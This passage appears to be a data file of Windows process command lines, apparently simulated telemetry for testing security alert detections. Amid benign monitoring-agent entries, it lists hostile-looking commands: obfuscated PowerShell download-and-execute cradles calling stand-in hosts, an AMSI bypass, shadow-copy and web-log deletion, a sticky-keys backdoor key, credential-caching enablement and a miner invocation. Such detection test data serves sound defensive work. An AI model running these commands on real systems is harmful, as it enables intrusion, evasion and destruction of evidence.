in\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\".\\\\reg not /domain:everything that /sid:shines is /krbtgt:golden !\",\"cmd /c \\\"systeminfo && systeminfo\\\"\",\".\\\\rundll32 /C 42424.exe\",\"42424.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\42424.exe\",\".\\\\rundll32 /C 1234.exe\",\"1234.exe\",\".\\\\rundll32 /C c:\\\\users\\\\MSTICAdmin\\\\1234.exe\",\".\\\\rundll32 /C reg.exe\",\"reg.exe\",\".\\\\reg.exe add \\\\hkcu\\\\software\\\\microsoft\\\\some\\\\key\\\\Run /v abadvalue\",\"c:\\\\Diagnostics\\\\UserTmp\\\\tsetup.1.exe C:\\\\Users\\\\MSTICAdmin\\\\AppData\\\\Local\\\\Temp\\\\2\\\\is-01DD7.tmp\\\\tsetup.1.0.14.tmp\\\" /SL5=\\\"$250276,19992586,423424,C:\\\\Users\\\\MSTICAdmin\\\\Downloads\\\\tsetup.1.0.14.exe\",\".\\\\rundll32.exe /C mshtml,RunHTMLApplication javascript:alert(tada!)\",\".\\\\netsh.exe \\\"in (*.exe) do start # artificial commandline solely for purposes of triggering test\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell Enable-WSManCredSSP =2013Role Server -force&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&powershell winrm set winrm/config/service/Auth @{Kerberos=003D\\\"true\\\"}&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\ProgramData\\\"© \\\\\\\\[REDACTED]\\\\c$\\\\users\\\\[REDACTED]\\\\Documents\\\\\\\"Password Change Dates.docx\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&c:\\\\windows\\\\system32\\\\inetsrv\\\\appcmd set config \\\"Default Web Site/\\\" /section:httplogging /dontLog:true&echo [S]&cd&echo [E]\\\"\",\".\\\\cmd /c \\\"cd /d \\\"C:\\\\inetpub\\\\wwwroot\\\"&del C:\\\\inetpub\\\\logs\\\\logFiles\\\\W3SVC1\\\\*.log /q&echo [S]&cd&echo [E]\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\perfc.dat \",\"c:\\\\Diagnostics\\\\UserTmp\\\\sdopfjiowtbkjfnbeioruj.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\doubleextension.pdf.exe \",\"vssadmin delete shadows /all /quiet\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\sysWOW64\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"cmd.exe /c c:\\\\Diagnostics\\\\WindowsSimulateDetections.bat c:\\\\Diagnostics\\\\UserTmp\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c echo Any questions about the commands executed here then please contact one of\",\"cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft.com; dotanp@microsoft.com; liengli@microsoft.com\",\"net user adm1nistrator Bob_testing /add\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator Bob_testing /add\",\"net share TestShare=c:\\\\testshare /Grant:Users,Read\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare=c:\\\\testshare /Grant:Users,Read\",\"dism /online /enable-feature /featurename:File-Services /NoRestart\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"net use q: \\\\\\\\MSTICAlertsWin1\\\\TestShare Bob_testing /User:adm1nistrator\",\"C:\\\\Windows\\\\TEMP\\\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\\\dismhost.exe {D57BA872-53C0-424D-80AE-E49112D1CF04}\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\winsxs\\\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.2602_none_7ee6020e2207416d\\\\TiWorker.exe -Embedding\",\"net use q: /delete\",\"net share TestShare /delete\",\"C:\\\\Windows\\\\system32\\\\net1 share TestShare /delete\",\"net user adm1nistrator /delete\",\"C:\\\\Windows\\\\system32\\\\net1 user adm1nistrator /delete\",\".\\\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\suchost.exe -a cryptonight -o bcn -u bond007.01 -p x -t 4\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo TVqQAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> delme.b64\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','google.png')}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell.exe -c \\\"$a = 'Download'+'String'+\\\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\\\";$b = '(New-Object' + ' Net.WebClient)';'$b.$a' | Out-File .\\\\evil.ps1;\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\\\"{2}{0}{1}\\\"-f ':/','/paste','tp')+'bin/'+'raw/'+(\\\"{1}{0}\\\"-f'Em17','pqCw')));}\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^tar^t-bITSTRanS^fER -^SOURCE^ 'http://somedomain/best-kitten-names-1.jpg' ^-d^EStIN^At^IOn ^'C:\\\\Users\\\\$env:UserName\\\\AppData\\\\Local\\\\Temp\\\\kittens1.jpg';\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\".\\\\n^e^t u^se^r\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -enc JAB0ACAAPQAgACcAZABpAHIAJwA7AA0ACgAmACAAKAAnAEkAbgB2AG8AawBlACcAKwAnAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAnACkAIAAkAHQA\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"cmd /c \\\"echo # aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa >> blah.ps1\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"certutil -decode delme.b64 implant.exe\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"implant.exe k111\",\"implant.exe 81ed03caf6901e444c72ac67d192fb9c\",\"implant.exe -b -t -m\",\"cmd /c \\\"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -Noninteractive -Noprofile -Command \\\"Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-Shellcode.ps1\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell Invoke-ReverseDnsLookup.ps1\",\"\\\"C:\\\\Windows\\\\System32\\\\win32calc.exe\\\" \",\".\\\\powershell -command \\\"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqCwEm17'));\\\"\",\"net localgroup Administrators\",\"C:\\\\Windows\\\\system32\\\\net1 localgroup Administrators\",\"whoami\",\"hostname\",\"netstat -an\",\"net user Bob1 /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user Bob1 /domain\",\"net user BobX /domain\",\"C:\\\\Windows\\\\system32\\\\net1 user BobX /domain\",\"net group \\\"Domain Admins\\\" /domain\",\"C:\\\\Windows\\\\system32\\\\net1 group \\\"Domain Admins\\\" /domain\",\".\\\\rUnDlL32 /C ShEll32Control_RanDLL.dll\",\".\\\\reg query add mscfile\\\\\\\\\\\\\\\\open\",\".\\\\reg add Image File Execution Options sethc.exe\",\".\\\\ftp -s:C:\\\\RECYCLER\\\\xxppyy.exe\",\".\\\\dubrute.exe\",\".\\\\nlbrute.exe\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x1 /f\",\".\\\\reg add \\\"HKLM\\\\system\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\" /v \\\"fDenyTSConnections\\\" /t REG_DWORD /d 0x0 /f\",\"net use v: \\\\\\\\tsclient\\\\c\",\"net v: /delete\",\"C:\\\\Windows\\\\system32\\\\net1 v: /delete\",\"cmd /c C:\\\\Windows\\\\System32\\\\mshta.exe vbscript:CreateObject(\\\"Wscript.Shell\\\").Run(\\\".\\\\powershell.exe -c \\\"\\\"$x=$((gp HKLM:Software\\\\Microsoft\\\\Windows\\\\CurrentVersion Certificate).Certificate);.\\\\powershell -E $y\\\"\\\"\\\",0,True)(window.close)\",\".\\\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\\\users\\\\Bob\\\\appdata\\\\Roaming\\\\RbtGskQ\\\\RbtGskQ.exe\",\".\\\\reg add HKLM\\\\KEY_LOCAL_MACHINE\\\\...securityproviders\\\\wdigest uselogoncredential /t 1\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"c:\\\\Windows\\\\System32\\\\cmd.exe /c net user\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd /c c:\\\\Diagnostics\\\\UserTmp\\\\scrsave.scr\\\"\",\"c:\\\\Diagnostics\\\\UserTmp\\\\svchost.exe \",\"c:\\\\Diagnostics\\\\UserTmp\\\\smss.exe \",\"c:\\\\Windows\\\\System32\\\\svchost.exe -k malicious\",\"cmd.exe /c echo createobject\\\"msxml2.xmlhttp\\\") \",\"ASC_Alerttest_662jfi039n.exe -foo\",\".\\\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue($null,$true)\\\\\\\"\",\"netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\\\\\Users\\\\\\\\user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\bzzzzzz.txt\",\".\\\\wuauclt.exe /C \\\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\\\"\",\"c:\\\\windows\\\\softwaredistribution\\\\cscript.exe\",\"C:\\\\Windows\\\\system32\\\\net1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service 